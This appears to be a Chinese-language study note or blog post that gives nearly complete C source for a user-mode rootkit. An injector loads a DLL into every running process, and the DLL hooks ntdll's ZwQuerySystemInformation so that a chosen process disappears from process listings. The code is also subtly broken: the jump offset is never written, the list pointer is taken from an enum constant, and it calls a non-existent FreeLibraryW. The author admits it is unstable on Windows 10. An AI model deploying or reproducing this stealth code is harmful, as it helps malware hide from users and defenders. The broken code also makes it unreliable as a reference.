0x01须知
需要技术:全局API勾取。
原理:进程是内核对象,通过相关API可以检测到他们,用户模式下检测API分为2类
CreateToolhelp32Snapshot()和EnumProcess()函数。但是2个API最终都会调用ntdll.ZwQuerySystemInformation()API
ZwQuerySystemInformation
(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
)
系统借助这个API可以获得运行中所有进程的信息(结构体),形成一个链表,操作该链表把进程信息从列表中删除即可隐藏相关进程。
需要解决的问题:每个进程监视的工具都需要钩取,每个新打开的进程监视工具也需要立即进行钩取。
实现思路:HideProc.exe负责将stealth.dll文件注入到所有运行的进程,Stealth.dll负责钩取进程的ntdll.ZwQuerySystemInformation()API
0x02HideProc
InjectAllProcess()函数
#include"windows.h"
#include"tlhelp32.h"
BOOL InjectAllProcess(int nMode, LPCTSTR szDllPath)
{
DWORD dwPID = 0;
HANDLE hSnapShot = INVALID_HANDLE_VALUE;
PROCESSENTRY32 pe;
//获取系统快照
pe.dwSize = sizeof(PROCESSENTRY32);
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL);
//查找进程
Process32First(hSnapShot, &pe);
do
{
dwPID = pe.th32ProcessID;
//鉴于系统安全性考虑,PID小于100的系统进程不执行dll注入操作
if (dwPID < 100)
{
continue;
}
if (nMode == INJECTION_MODE)
InjectDll(dwPID, szDllPath);
else
EjectDll(dwPID, szDllPath);
} while (Process32Next(hSnapShot, &pe));
CloseHandle(hSnapShot);
return TRUE;
}
负责获取系统快照,,然后注入。
注入函数
BOOL InjectDll(DWORD dwPID, LPCTSTR szDllPath)//注入dll
{
HANDLE hProcess = NULL, hThread = NULL;
HMODULE hMod = NULL;
LPVOID pRemoteBuf = NULL;
DWORD dwBufSize = (DWORD)(_tcslen(szDllPath) + 1)*sizeof(TCHAR);
LPTHREAD_START_ROUTINE pThreadProc;
//使用dwpid获取目标进程句柄
if (!(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)))
{
_tprintf(L"OpenProcess(%d) failed!!![%d]\n", dwPID, GetLastError());
return FALSE;
}
//在目标进程内存中分配szDllname大小的内存
pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, MEM_COMMIT, PAGE_READWRITE);//分配物理存储,可读可写
//将myhack.dll路径写入分配的内存。
WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllPath, dwBufSize, NULL);
//获取LoadLibraryW API的地址
hMod = GetModuleHandle(L"Kernel32.dll");//获取已经加载模块的句柄
pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hMod, "LoadLibraryW");//获取函数地址
//在目标进程中运行线程
hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pRemoteBuf, 0, NULL);//创建远程线程
_tprintf(L"%d", GetLastError());
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hProcess);
printf("Inject : %d", GetLastError());
return TRUE;
}
还需要提升权限
BOOL SetPrivilege(LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)//提升权限,只有先提升HideProc.exe进程的权限(特权)才能准确获取所有进程的列表
{
TOKEN_PRIVILEGES tp;
HANDLE hToken;
LUID luid;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
_tprintf(L"LookupPrivilegeValue error: %u\n", GetLastError());
return FALSE;
}
if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
{
_tprintf(L"LookupPrivilegeValue error: %u\n", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
//enable the privilege or disable all privileges.
if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
{
_tprintf(L"AdjustTokenPrivileges error: %u\n", GetLastError());
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
_tprintf(L"the token does nothave rhe specified privilege %d .\n",GetLastError());
return FALSE;
}
printf("TQ %d", GetLastError());
return TRUE;
}
卸载dll
BOOL EjectDll(DWORD dwPID, LPCTSTR szDllPath)
{
HANDLE hProcess = NULL, hThread = NULL;
HMODULE hMod = NULL;
LPVOID pRemoteBuf = NULL;
DWORD dwBufSize = (DWORD)(_tcslen(szDllPath) + 1)*sizeof(TCHAR);
LPTHREAD_START_ROUTINE pThreadProc;
if (!(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)))
{
_tprintf(L"OpenProcess(%d) failed!!![%d]\n", dwPID, GetLastError());
}
pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllPath, dwBufSize, NULL);
hMod = GetModuleHandle(L"Kernel32.dll");
pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hMod, "FreeLibraryW");
hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pRemoteBuf, 0, NULL);
_tprintf(L"%d", GetLastError());
CloseHandle(hProcess);
return TRUE;
}
还有一个main
int _tmain(int argc, TCHAR* argv[])
{
int nMode = INJECTION_MODE;
HMODULE hLib = NULL;
PFN_SetProcName SetProcName = NULL;
if (argc != 4)
{
printf("\n Usage : HideProc.exe <-hide|-show> <Process name> <dll path>\n\n");
return 1;
}
SetPrivilege(SE_DEBUG_NAME, TRUE);
hLib = LoadLibrary(argv[3]);
SetProcName = (PFN_SetProcName)GetProcAddress(hLib, "SetProcName");
SetProcName(argv[2]);
if (!_tcsicmp(argv[1], L"-show"))
nMode = EJECTION_MODE;
InjectAllProcess(nMode, argv[3]);
FreeLibrary(hLib);
return 0;
}
//调用dll导出函数的方法:LoadLibrary --> GetProcAddress(获取导出函数的地址) --> 调用导出函数
//使用一个函数的地址调用一个函数方法:定义:typedef void(*PFN_SetProcName)(LPCTSTR szProcName); 实体化:PFN_SetProcName SetProcName = NULL; 调用:SetProcName(argv[2]);
dll实现
#include"windows.h"
#include"tlhelp32.h"
#include "tchar.h"
#include "stdio.h"
#define STATUS_SUCCESS (0x00000000L)
typedef LONG NTSTATUS;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemProcessInformation = 5,
SystemProcessorPerformanceInformation = 8,
SystemInterruptInformation = 23,
SystemExceptionInformation = 33,
SystemRegistryQuotaInformation = 37,
SystemLookasideInformation = 45
} SYSTEM_INFORMATION_CLASS;
//该结构体链表中存储着运行中所有进程的信息,这里的链表是一段连续的空间。
typedef struct _SYSTEM_PROCESS_INFORMATION {
ULONG NextEntryOffset;
ULONG NumberOfThreads;
BYTE Reserved1[48];
PVOID Reserved2[3];
HANDLE UniqueProcessId;
PVOID Reserved3;
ULONG HandleCount;
BYTE Reserved4[4];
PVOID Reserved5[11];
SIZE_T PeakPagefileUsage;
SIZE_T PrivatePageCount;
LARGE_INTEGER Reserved6[6];
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
typedef NTSTATUS(WINAPI *PFZWQUERYSYSTEMINFORMATION)
(SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
#define DEF_NTDLL ("ntdll.dll")
#define DEF_ZWQUERYSYSTEMINFORMATION ("ZwQuerySystemInformation")
BYTE g_pOrgBytes[5] = { 0 };
//global variable (in sharing memory)
#pragma comment(linker,"/SECTION:.SHARE,RWS")
#pragma data_seg(".SHARE")
TCHAR g_szProcName[MAX_PATH] = { 0 };
#pragma data_seg()
//export function
#ifdef __cplusplus
extern "C"{
#endif
__declspec(dllexport) void SetProcName(LPCTSTR szProcName)
{
_tcscpy_s(g_szProcName, szProcName);
}
#ifdef __cplusplus
}
#endif
//包含要钩取API的dll模块文件名称 , 要钩取的API名称 , 用户提供的钩取函数地址 , 存储原来的5字节缓冲区
BOOL hook_by_code(LPCSTR szDllName, LPCSTR szFuncName, PROC pfnNew, PBYTE pOrgBytes)
{
FARPROC pfnOrg;
DWORD dwOldProtect, dwAddress;
byte pBuf[5] = { 0xE9, 0, };
PBYTE pByte;
//获取要钩取的API地址
pfnOrg = (FARPROC)GetProcAddress(GetModuleHandleA(szDllName), szFuncName);//szDllName模块的szFuncName函数
pByte = (PBYTE)pfnOrg;
//若已被钩取则返回FALSE
if (pByte[0] == 0xE9)//0xE9表示跳转指令
{
return FALSE;
}
//为了修改5个字节,先向内存中添加写属性
VirtualProtect((LPVOID)pfnOrg, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect);
//备份原有代码
memcpy(pOrgBytes, pfnOrg, 5);
//计算jmp地址 (E9 XXXXXXXX)
//XXXXXXXX = (DWORD)pfnNew - (DWORD)pfnOrg - 5;
//XXXXXXXX=要跳转的地址-当前指令地址-当前指令长度
dwAddress = (DWORD)pfnNew - (DWORD)pfnOrg - 5; //减是因为采用小端存储
memcpy(pfnOrg, pBuf, 5);
//恢复内存属性
VirtualProtect((LPVOID)pfnOrg, 5, dwOldProtect, &dwOldProtect);
return TRUE;
}
//获取函数要修改函数地址 --> 计算jmp偏移 --> 更改权限 --> 保存,写入数据 --> 更改权限
//所谓钩取,在要钩取的函数的开始几个字节改成jmp指令跳转到注入的dll中执行设计好的函数
//
BOOL unhook_by_code(LPCSTR szDllName, LPCSTR szFuncName, PBYTE pOrgBytes)//
{
FARPROC pfnOrg;
DWORD dwOldProtect, dwAddress;
byte pBuf[5] = { 0xE9, 0, };
PBYTE pByte;
//获取要unhook的API地址
pfnOrg = (FARPROC)GetProcAddress(GetModuleHandleA(szDllName), szFuncName);//szDllName模块的szFuncName函数
pByte = (PBYTE)pfnOrg;
//若未被钩取则返回FALSE
if (pByte[0] != 0xE9)//0xE9表示跳转指令
{
return FALSE;
}
//为了修改5个字节,先向内存中添加写属性
VirtualProtect((LPVOID)pfnOrg, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect);
//备份原有代码
memcpy(pfnOrg, pOrgBytes, 5);
memcpy(pBuf, pfnOrg, 5);
//恢复内存属性
VirtualProtect((LPVOID)pfnOrg, 5, dwOldProtect, &dwOldProtect);
return TRUE;
}
//所谓unhook就是把原本模块对应函数出修改的jmp指令还原为原本的指令
NTSTATUS WINAPI NewZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength)
{
NTSTATUS status;
FARPROC pFunc;
PSYSTEM_PROCESS_INFORMATION pCur, pPrev;
char szProcName[MAX_PATH] = { 0, };
//开始前先脱钩
unhook_by_code(DEF_NTDLL, DEF_ZWQUERYSYSTEMINFORMATION, g_pOrgBytes);
//调用原始API
pFunc = GetProcAddress(GetModuleHandleA(DEF_NTDLL), DEF_ZWQUERYSYSTEMINFORMATION);
status = ((PFZWQUERYSYSTEMINFORMATION)pFunc)(Syst emInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
if (status != STATUS_SUCCESS)
goto __NIQUERYSYSTEMINFORMATION_ENND;
//仅仅针对SystemProcessInformation类型操作
if (SystemInformationClass == SystemProcessInformation)
{
//SYSTEM_PROCESS_INFORMATION类型转换
//pCur是单向链表的头
pCur = (PSYSTEM_PROCESS_INFORMATION)SystemProcessInformation;
while (TRUE)
{
//比较进程名称
//g_szProcName为要隐藏的进程名称
if (pCur->Reserved2[1] != NULL)
{
if (!_tcsicmp((PWSTR)pCur->Reserved2[1], g_szProcName))//Reserved2[1]里面存放着进程名
{
//从链表中删除要隐藏进程的名称
if (pCur->NextEntryOffset == 0)
pPrev->NextEntryOffset = 0;
else
pPrev->NextEntryOffset += pCur->NextEntryOffset;//这里需要用加等
}
else
pPrev = pCur;
}
if (pCur->NextEntryOffset == 0)
break;
//链表的下一项
pCur = (PSYSTEM_PROCESS_INFORMATION)((ULONG)pCur + pCur->NextEntryOffset);
}
}
__NIQUERYSYSTEMINFORMATION_ENND:
//函数终止前再次执行API钩取操作位下次调用准备
hook_by_code(DEF_NTDLL, DEF_ZWQUERYSYSTEMINFORMATION, (PROC)NewZwQuerySystemInformation, g_pOrgBytes);
return status;
}
BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD fdwReason, LPVOID lpvRserved)
{
char szCurProc[MAX_PATH] = { 0, };
char *p = NULL;
//异常处理,如果当前进程位HideProc。exe则终止,不进行操作
GetModuleFileNameA(NULL, szCurProc, MAX_PATH);
p = strrchr(szCurProc, '\\');//找到filename
//if ((p != NULL) && !_stricmp(p + 1, "HideProc.exe"))
//return TRUE;
switch (fdwReason)
{
//API钩取
case DLL_PROCESS_ATTACH:
hook_by_code(DEF_NTDLL, DEF_ZWQUERYSYSTEMINFORMATION, (PROC)NewZwQuerySystemInformation, g_pOrgBytes);
//钩取DEF_NTDLL模块的DEF_ZWQUERYSYSTEMINFORMATION函数钩取到了之后将执行NewZwQuerySystemInformation,用来存储被钩取函数的原数据
break;
//脱钩
case DLL_PROCESS_DETACH:
unhook_by_code(DEF_NTDLL, DEF_ZWQUERYSYSTEMINFORMATION, g_pOrgBytes);
break;
}
return TRUE;
}
win10测试不通过,很不稳定,暂时不知道什么原因。